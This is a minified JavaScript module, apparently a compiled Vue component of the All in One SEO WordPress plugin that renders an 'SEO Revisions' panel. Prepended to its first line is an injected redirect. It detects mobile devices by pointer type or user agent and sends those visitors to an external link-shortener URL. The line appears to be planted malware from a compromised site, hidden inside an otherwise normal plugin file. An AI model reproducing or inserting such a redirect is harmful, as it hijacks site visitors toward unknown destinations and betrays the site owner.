(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{j as R,M as L,A as U,h as A}from"./app-core.c8323d51.js";import{C as E}from"./Blur.dea2904a.js";import{C as I}from"./Index.6933f196.js";import{C as B}from"./SettingsRow.7bec777f.js";import{au as M,f as r,i as p,j as t,a0 as o,v as c,U as u,aq as n,O as N,ad as T,R as i,ae as f,T as V,M as z,Q as x}from"./vendor-vue-ui.232c7c36.js";import{S as j}from"./Eye.aa46a178.js";import{_ as D}from"./Trash.47f6fc0e.js";import{U as F,S as q}from"./Upsell.bbfae4ed.js";import{_ as v}from"./_plugin-vue_export-helper.eefbdd86.js";import{S as P}from"./Short.4777dde1.js";import{_ as h}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./Close.7fb523c8.js";import"./Row.2ef96b1a.js";import"./Profile.33a3ea22.js";import"./Index.e286637f.js";import"./Index.b9859662.js";import"./Button.3cec2279.js";import"./Pencil.683baab8.js";import"./RequiredPlans.e5238a4f.js";const Q={class:"aioseo-seo-revision-list-item"},W={class:"aioseo-seo-revision-list-item__author"},G={class:"aioseo-seo-revision-list-item__author__avatar"},H={class:"aioseo-seo-revision-list-item__author__name"},J={class:"aioseo-seo-revision-list-item__action"},K={class:"aioseo-seo-revision-list-item__action__view"},X={class:"aioseo-seo-revision-list-item__action__delete"},Y={__name:"ListItem",setup(m){const{currentUser:s}=M(R());return(d,e)=>(r(),p("div",Q,[t("div",W,[t("span",G,[o(c(F),{src:c(s).avatar.url,size:c(s).avatar.size},null,8,["src","size"])]),t("span",H,u(c(L)(c(s).display_name,30)),1)]),e[1]||(e[1]=t("div",{class:"aioseo-seo-revision-list-item__date"}," 1 week ago (2 Dec, 2022 @ 18:28:57) ",-1)),t("div",J,[e[0]||(e[0]=t("span",{class:"aioseo-seo-revision-list-item__action__compare"}," Compare ",-1)),t("span",K,[o(c(j),{width:"18"})]),t("span",X,[o(c(D),{width:"18"})])])]))}},Z=v(Y,[["__scopeId","data-v-20175fdb"]]),oo={components:{SeoRevisionListItem:Z}},eo={class:"aioseo-seo-revisions-list"};function so(m,s,d,e,a,C){const _=n("seo-revision-list-item");return r(),p("div",eo,[(r(),p(N,null,T(13,l=>o(_,{key:"seo-revision-list-item-"+l})),64))])}const to=v(oo,[["render",so],["__scopeId","data-v-7b502c37"]]),S="all-in-one-seo-pack",no={setup(){return{seoRevisionsStore:R()}},components:{CoreBlur:E,CoreModal:I,CoreSettingsRow:B,SeoRevisionsList:to,SeoRevisionsUpsell:q,SvgRightArrowShort:P},data(){return{strings:{button:h("Open SEO Revisions",S),description:h("With our powerful revisions feature for all your SEO data, never lose the exact SEO title or description (and more!) that helped you rank higher in search results and restore it back in a single click.",S),seoRevisions:h("SEO Revisions",S)}}}},io={key:0,class:"aioseo-seo-revisions-metabox"},ro={key:1,class:"aioseo-seo-revisions-sidebar"},ao={class:"aioseo-seo-revisions-sidebar__modal-body"},co={class:"description"};function _o(m,s,d,e,a,C){const _=n("seo-revisions-list"),l=n("core-blur"),g=n("seo-revisions-upsell"),y=n("core-modal"),$=n("svg-right-arrow-short"),w=n("base-button"),k=n("core-settings-row");return m.$root.$data.screenContext==="metabox"?(r(),p("div",io,[o(l,null,{default:i(()=>[o(_)]),_:1}),o(g,{"parent-component-context":"metabox"})])):m.$root.$data.screenContext==="sidebar"?(r(),p("div",ro,[o(y,{show:e.seoRevisionsStore.modalOpenSidebar,classes:[],onClose:s[0]||(s[0]=O=>e.seoRevisionsStore.modalOpenSidebar=!1)},{headerTitle:i(()=>[f(u(a.strings.seoRevisions),1)]),body:i(()=>[t("div",ao,[o(l,null,{default:i(()=>[o(_)]),_:1}),o(g,{"parent-component-context":"modal"})])]),_:1},8,["show"]),o(k,{align:""},{name:i(()=>[f(u(a.strings.seoRevisions),1)]),description:i(()=>[t("p",co,u(a.strings.description),1)]),content:i(()=>[o(w,{class:"gray small",onClick:s[1]||(s[1]=V(O=>e.seoRevisionsStore.modalOpenSidebar=!0,["stop","exact"]))},{default:i(()=>[o($,{width:"10"}),f("   "+u(a.strings.button),1)]),_:1})]),_:1})])):z("",!0)}const b=v(no,[["render",_o],["__scopeId","data-v-eda67d56"]]),lo={setup(){return{licenseStore:A()}},components:{SeoRevisions:b,SeoRevisionsLite:b},props:{parentComponentContext:String},data(){return{license:U}}},po={class:"aioseo-seo-revisions aioseo-tab-content"};function mo(m,s,d,e,a,C){const _=n("seo-revisions",!0),l=n("seo-revisions-lite");return r(),p("div",po,[!e.licenseStore.isUnlicensed&&a.license.hasCoreFeature("seo-revisions")?(r(),x(_,{key:0,parentComponentContext:d.parentComponentContext},null,8,["parentComponentContext"])):(r(),x(l,{key:1,parentComponentContext:d.parentComponentContext},null,8,["parentComponentContext"]))])}const Bo=v(lo,[["render",mo],["__scopeId","data-v-463f2e4b"]]);export{Bo as default};
